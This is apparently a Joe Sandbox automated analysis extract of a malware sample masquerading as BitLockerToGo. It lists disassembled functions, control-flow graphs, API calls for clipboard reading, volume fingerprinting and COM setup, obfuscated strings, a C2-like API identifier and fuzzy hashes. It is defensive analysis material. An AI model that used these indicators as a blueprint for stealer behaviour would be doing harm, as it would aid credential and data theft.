                                                                                                                                                          control_flow_graph 192 443d4f-443d7a 193 443ea0-443ea9 call 40c720 192->193 194 443eb0-443eb6 call 40c720 192->194 195 443d81-443d97 192->195 196 443e2d-443e3b 192->196 197 443ebf-443ede 192->197 198 443e9a 192->198 193->194 194->197 201 443d9e-443dbb call 40c710 195->201 202 443d99-443d9c 195->202 199 443e42-443e43 call 40c710 196->199 200 443e3d-443e40 196->200 205 443ef0-443f1a 197->205 206 443f21-443f3a 197->206 207 4441d9-4441e6 197->207 214 443e48-443e65 199->214 200->199 217 443e6c-443e93 201->217 218 443dc1-443dc3 201->218 202->201 205->206 205->207 208 443f40-443f50 206->208 208->208 213 443f52-443f68 208->213 216 443f70-443f9b 213->216 214->206 214->207 214->217 216->216 219 443f9d-443fa4 216->219 217->193 217->194 217->197 217->198 217->206 217->207 218->217 220 443dc9-443dcb 218->220 221 443fa6-443fb5 219->221 222 444020-444032 219->222 223 443dcd-443dcf 220->223 224 443e1f-443e26 220->224 225 443fb7-443fc6 221->225 226 444002-444007 221->226 222->205 227 4440a4-4440ac 222->227 228 444125-44412b 222->228 229 4441c0-4441d2 222->229 230 444060-444084 222->230 231 4440e0 222->231 232 444140-444146 222->232 233 4440e2-4440ee 222->233 234 4440c2-4440cb 222->234 235 444182-4441b5 222->235 236 44416c-44417b 222->236 237 4440f5-444104 222->237 238 444050-444059 222->238 239 444090-44409d 222->239 240 444110-44411e 222->240 241 444130 222->241 242 444150 222->242 243 4440d2-4440df 222->243 244 444132-444137 222->244 245 444152 222->245 246 4440b3-4440bb 222->246 247 444039-444049 222->247 248 444159-444165 222->248 249 443dd0-443e1d 223->249 224->193 224->194 224->196 224->197 224->198 224->206 224->207 250 443fd0-443ffe 225->250 226->222 251 444009-44400f 226->251 227->228 227->229 227->231 227->232 227->233 227->234 227->235 227->236 227->237 227->240 227->241 227->242 227->243 227->244 227->245 227->246 227->248 228->241 229->206 229->207 230->227 230->228 230->229 230->231 230->232 230->233 230->234 230->235 230->236 230->237 230->239 230->240 230->241 230->242 230->243 230->244 230->245 230->246 230->248 231->233 252 444148-44414f 232->252 233->228 233->229 233->232 233->235 233->236 233->237 233->240 233->241 233->242 233->244 233->245 233->248 234->227 234->228 234->229 234->231 234->232 234->233 234->234 234->235 234->236 234->237 234->239 234->240 234->241 234->242 234->243 234->244 234->245 234->246 234->248 235->206 235->207 235->229 236->229 236->235 237->228 237->229 237->232 237->235 237->236 237->240 237->241 237->242 237->244 237->245 237->248 238->227 238->228 238->229 238->230 238->231 238->232 238->233 238->234 238->235 238->236 238->237 238->239 238->240 238->241 238->242 238->243 238->244 238->245 238->246 238->248 239->227 239->228 239->229 239->231 239->232 239->233 239->234 239->235 239->236 239->237 239->240 239->241 239->242 239->243 239->244 239->245 239->246 239->248 240->228 240->229 240->232 240->235 240->236 240->241 240->242 240->244 240->245 240->248 243->231 244->252 245->248 246->228 246->229 246->231 246->232 246->233 246->234 246->235 246->236 246->237 246->240 246->241 246->242 246->243 246->244 246->245 246->248 247->227 247->228 247->229 247->230 247->231 247->232 247->233 247->234 247->235 247->236 247->237 247->238 247->239 247->240 247->241 247->242 247->243 247->244 247->245 247->246 247->248 248->228 248->229 248->232 248->235 248->236 248->240 248->241 248->242 248->244 248->245 248->248 249->224 249->249 250->250 253 444000 250->253 254 444010-44401e 251->254 252->242 253->226 254->222 254->254
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 2AD$RAD$@D
                                                                                                                                                          • API String ID: 0-3582015610
                                                                                                                                                          • Opcode ID: ea4e0c86f75012814c625301c25dbf1953a5eab78e3f56fb16b9dd3b3d3b046e
                                                                                                                                                          • Instruction ID: b29bc3ce0ce52f2a802cac78edcec5ed59897568a8abb7e99fb958c72efa2712
                                                                                                                                                          • Opcode Fuzzy Hash: ea4e0c86f75012814c625301c25dbf1953a5eab78e3f56fb16b9dd3b3d3b046e
                                                                                                                                                          • Instruction Fuzzy Hash: EAC11636608351CFC724CF39E88021AB7E2AB99316F5D8A7DD895873A6E734DA05CB44
                                                                                                                                                          Function 004438E4 Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 255 4438e4-4438fb 256 443900-443938 255->256 256->256 257 44393a-443941 256->257 258 443943-44394f 257->258 259 443979-44398f 257->259 260 443950-443957 258->260 261 443960-443966 260->261 262 443959-44395c 260->262 261->259 264 443968-443971 call 443090 261->264 262->260 263 44395e 262->263 263->259 266 443976 264->266 266->259
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: ;:=<$5L
                                                                                                                                                          • API String ID: 2994545307-3673700819
                                                                                                                                                          • Opcode ID: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
                                                                                                                                                          • Instruction ID: 0915b61cec8b6da82ef9958de482462b63df0f8c2db182df6872d9399d6bb0c3
                                                                                                                                                          • Opcode Fuzzy Hash: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
                                                                                                                                                          • Instruction Fuzzy Hash: F6115572B40206ABEB048E58C8827FAB7B2EB82716F241039E141E73D2D378CF02D755
                                                                                                                                                          Function 00443090 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LdrInitializeThunk.NTDLL(004463BD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004430BE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                          Function 004439B5 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ;:=<
                                                                                                                                                          • API String ID: 0-1779823811
                                                                                                                                                          • Opcode ID: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
                                                                                                                                                          • Instruction ID: adc97f9d6fe2411c167095a796a90811affcd3ff35bd650b1f034ac4979ada3a
                                                                                                                                                          • Opcode Fuzzy Hash: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
                                                                                                                                                          • Instruction Fuzzy Hash: 3D21C331B402149BEB18CF58D8926EA73B1EB56706F151429E582F7393D23CDD029B55
                                                                                                                                                          Function 0040F819 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b33d5e7daedefb019597bc06dd43f22d754fd82a51e035dddc4ebd59be78687c
                                                                                                                                                          • Instruction ID: ea02171e685dfcb71a4e86459bfb6a5071aa3875873d77bf6977821c90d9e4a5
                                                                                                                                                          • Opcode Fuzzy Hash: b33d5e7daedefb019597bc06dd43f22d754fd82a51e035dddc4ebd59be78687c
                                                                                                                                                          • Instruction Fuzzy Hash: 8681D076241B00CFD3248F65DC90BA7B3F6FB89301F198A3DD996876A1D774A809CB54
                                                                                                                                                          Function 0043CB4D Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 69 43cb4d-43cb70 call 40c720 VariantClear 75 43cc27-43cc95 SysFreeString * 3 call 4457f0 GetVolumeInformationW 69->75 80 43cb80-43cb89 75->80 81 43cb90-43cb9c 75->81 82 43cba6-43cbca call 4352d0 75->82 83 43cca4-43ccb6 75->83 84 43cc9c-43cca3 75->84 80->81 80->82 81->82 85 43cba3 81->85 86 43cbf0-43cbfd 81->86 87 43cc04-43cc10 81->87 90 43cbd0-43cbd8 82->90 83->80 83->81 83->82 83->84 85->82 86->86 86->87 87->75 87->80 87->81 87->82 87->84 90->90 91 43cbda-43cbe4 90->91 91->86 91->87
                                                                                                                                                          APIs
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0043CB56
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC31
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC37
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC48
                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString$ClearInformationVariantVolume
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1909038640-0
                                                                                                                                                          • Opcode ID: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
                                                                                                                                                          • Instruction ID: 71f6587865aeb7983240f0c874f145aba01153f807fa23e12df9d9708cfabf33
                                                                                                                                                          • Opcode Fuzzy Hash: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
                                                                                                                                                          • Instruction Fuzzy Hash: 7A31CA3A608340DFD7149F20EC99B5EB3A6EB89316F18483CE505872A1EB75E414CB15
                                                                                                                                                          Function 0043C75E Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 269 43c75e-43c798 270 43c7a0-43c7e7 269->270 270->270 271 43c7e9-43c80e SysAllocString 270->271 272 43c812-43c817 271->272
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(C30DC172), ref: 0043C7EE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                          • Opcode ID: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
                                                                                                                                                          • Instruction ID: 32f87fcb3125a501a8162f492a5ccfcff4981966fb883e090f713be905f41a06
                                                                                                                                                          • Opcode Fuzzy Hash: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
                                                                                                                                                          • Instruction Fuzzy Hash: 02112C755883028FD314CF95C8C075ABBE1FBCA321F088A6CE4859B245D778D50ACFA1
                                                                                                                                                          Function 00440350 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 273 440350-44035f 274 440366-440377 273->274 275 4403c0 273->275 276 4403d1-4403d5 273->276 277 4403c2-4403cb RtlFreeHeap 273->277 278 440380-4403a6 274->278 275->277 277->276 278->278 279 4403a8-4403b1 278->279 279->275
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004403CB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                                                          • Instruction ID: 4a203bc74b8270b695fc07406262592e49ddfe5960292de94af20fe31efdee2e
                                                                                                                                                          • Opcode Fuzzy Hash: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                                                          • Instruction Fuzzy Hash: 03F0F6342893408FD709DB24ECB1B2A7BA9DB9A305F54457CD0C147292C27A982ADB92
                                                                                                                                                          Function 00443250 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 280 443250-443264 281 443270-4432a4 280->281 281->281 282 4432a6-4432ee GetForegroundWindow call 446050 281->282
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                          • Opcode ID: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                                                          • Instruction ID: 0a330300c86dc513bb90ae8d1cfff6d0cb8803b403817d65af22f579e6835f05
                                                                                                                                                          • Opcode Fuzzy Hash: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                                                          • Instruction Fuzzy Hash: 98014936A042409BE719CF79D87567BB7D1AF15306B08846DD187C7392E738A609C709
                                                                                                                                                          Function 00443016 Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 286 443016-44301d 287 443024-44302b 286->287 288 443070-443079 call 440350 286->288 289 443032-44303f 286->289 290 443068-44306e call 4402e0 286->290 287->288 287->289 297 44307b-443082 288->297 291 443040-443052 289->291 290->297 291->291 294 443054-443066 RtlReAllocateHeap 291->294 294->297
                                                                                                                                                          APIs
                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00443060
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 8bb3e970414ffc9c2c949af03973c1fc5cdc76312b598d5c6727cbb62392ed25
                                                                                                                                                          • Instruction ID: d129c93a184b066006015a983a9b899f1640726f44b1bfbb2ea2b15d68b00d4c
                                                                                                                                                          • Opcode Fuzzy Hash: 8bb3e970414ffc9c2c949af03973c1fc5cdc76312b598d5c6727cbb62392ed25
                                                                                                                                                          • Instruction Fuzzy Hash: 28F04634A04342DFE7110FB8ACE57A7BF64FB57715F0407BADA114A1A3DB388865C685
                                                                                                                                                          Function 004402F7 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0044033F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                                                          • Instruction ID: 802ee138748a9c1de57adb9ff5e7dd8bb977f0f805929440982499d5bfcd79cd
                                                                                                                                                          • Opcode Fuzzy Hash: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                                                          • Instruction Fuzzy Hash: 99F0EC39380724CFCB168AA2F840555B721EBC663A71881FAD9315BAE2C2790817CB90
                                                                                                                                                          Function 004432AF Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                          • Opcode ID: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                                                          • Instruction ID: 730dbf267ab9c65472c63067bb6e41d1d4c7e74c9f538b4d6545cc4e430076e3
                                                                                                                                                          • Opcode Fuzzy Hash: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0867E5003009FC700DF54EC9146937A0E7073063050439E143D33A2D734A544CB1A
                                                                                                                                                          Function 00411281 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411293
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                          • Opcode ID: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                                                          • Instruction ID: 1bf7a1bd5185e41d29c4a2cbb7d1407be12a0acaffe88bf902526c463dcd8eef
                                                                                                                                                          • Opcode Fuzzy Hash: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                                                          • Instruction Fuzzy Hash: ACD092343D8300B6F2710B08BC17F043120A303F22F700320B3207C1E189E07110961E
                                                                                                                                                          Function 0043C821 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C833
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                          • Opcode ID: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                                                          • Instruction ID: 654b4b1d450e911c26586d927dca2102275bdb567952844bef8e5804c0f87415
                                                                                                                                                          • Opcode Fuzzy Hash: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                                                          • Instruction Fuzzy Hash: BAD048383C4308BAF3324B14FC1BF083664B792F03F201420B781BC0E18AF1A2609A1E
                                                                                                                                                          Function 00411260 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00411271
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                                                          • Instruction ID: 3969f46c452db3cda2ce3cdd2237f3c33a7c6bfde3ae9b63386c6deee56049b4
                                                                                                                                                          • Opcode Fuzzy Hash: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                                                          • Instruction Fuzzy Hash: F9C08C30024208A7F220272DAC0BF43392CE303721F000330F9A0400D2AA106420C5BB

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 004207E0 Relevance: 38.9, Strings: 30, Instructions: 1384COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($("C$57W3$6~$7ABC$<=>?$DsQX$Ga@J$IJKL$LMNg$SH'T$T$U^_`$YZ[+$_=I?$`abc$akm~$h$h {$mnop$pqrs$q2)$r}$tuv?$uFuS$x$xr$y1D3$z$
                                                                                                                                                          • API String ID: 0-2038162739
                                                                                                                                                          • Opcode ID: 0bb57e1c5453cf98c4a9267963c7448f932b21328b9716a290e2aedad4505a53
                                                                                                                                                          • Instruction ID: 7cc78f0828f2510ceae9c517330c9c726504de680cfe05bf1d4d9fa86db73ffd
                                                                                                                                                          • Opcode Fuzzy Hash: 0bb57e1c5453cf98c4a9267963c7448f932b21328b9716a290e2aedad4505a53
                                                                                                                                                          • Instruction Fuzzy Hash: 29A212706083908BD734CF25D4907ABBBE1AFE6304F58892EE1D95B392D7788906CB57
                                                                                                                                                          Function 00436F40 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 113clipboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                          • String ID: $$%$&$'$)$+$.$9
                                                                                                                                                          • API String ID: 2832541153-3297824023
                                                                                                                                                          • Opcode ID: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
                                                                                                                                                          • Instruction ID: d33222a2ca9ce09790efce9b4cbed54a8356bf1745a76b5c02e39eac2e3862f8
                                                                                                                                                          • Opcode Fuzzy Hash: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
                                                                                                                                                          • Instruction Fuzzy Hash: 6B41D0B150D3818EE324AF7C944832EBFE09B96314F099A6EE8C647382C67D8549D797
                                                                                                                                                          Function 0040F0C0 Relevance: 17.9, Strings: 14, Instructions: 393COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$J<BJ$W?O=$\+^)$_'[%$bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/api$o/^-$rY$zkji$|p|~
                                                                                                                                                          • API String ID: 0-3751685462
                                                                                                                                                          • Opcode ID: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
                                                                                                                                                          • Instruction ID: 15a8b46ebdc9a7bf3cda1c7f0effdd0b9f87bdb17e5fa87fd4f559d09df8eecf
                                                                                                                                                          • Opcode Fuzzy Hash: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
                                                                                                                                                          • Instruction Fuzzy Hash: C9D1F27150C3909FD324CF25845036BFBE1ABD2714F18893EE8E95B782D779D90A8B86
                                                                                                                                                          Function 00429370 Relevance: 17.4, Strings: 13, Instructions: 1159COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 17$%*+($%*+($89$@A$SQ$Tt$W@$\2$`q$e{$}s$KI
                                                                                                                                                          • API String ID: 0-2776168135
                                                                                                                                                          • Opcode ID: caa393feddb61b5ab980e4308d2630fe3ea7cba71182b1c4dd4e8da5a0ccf1aa
                                                                                                                                                          • Instruction ID: 77d8aa534f1f83be8c5131470df92f8f68b724b1ad8a3d11a94acb0b5f81a1a6
                                                                                                                                                          • Opcode Fuzzy Hash: caa393feddb61b5ab980e4308d2630fe3ea7cba71182b1c4dd4e8da5a0ccf1aa
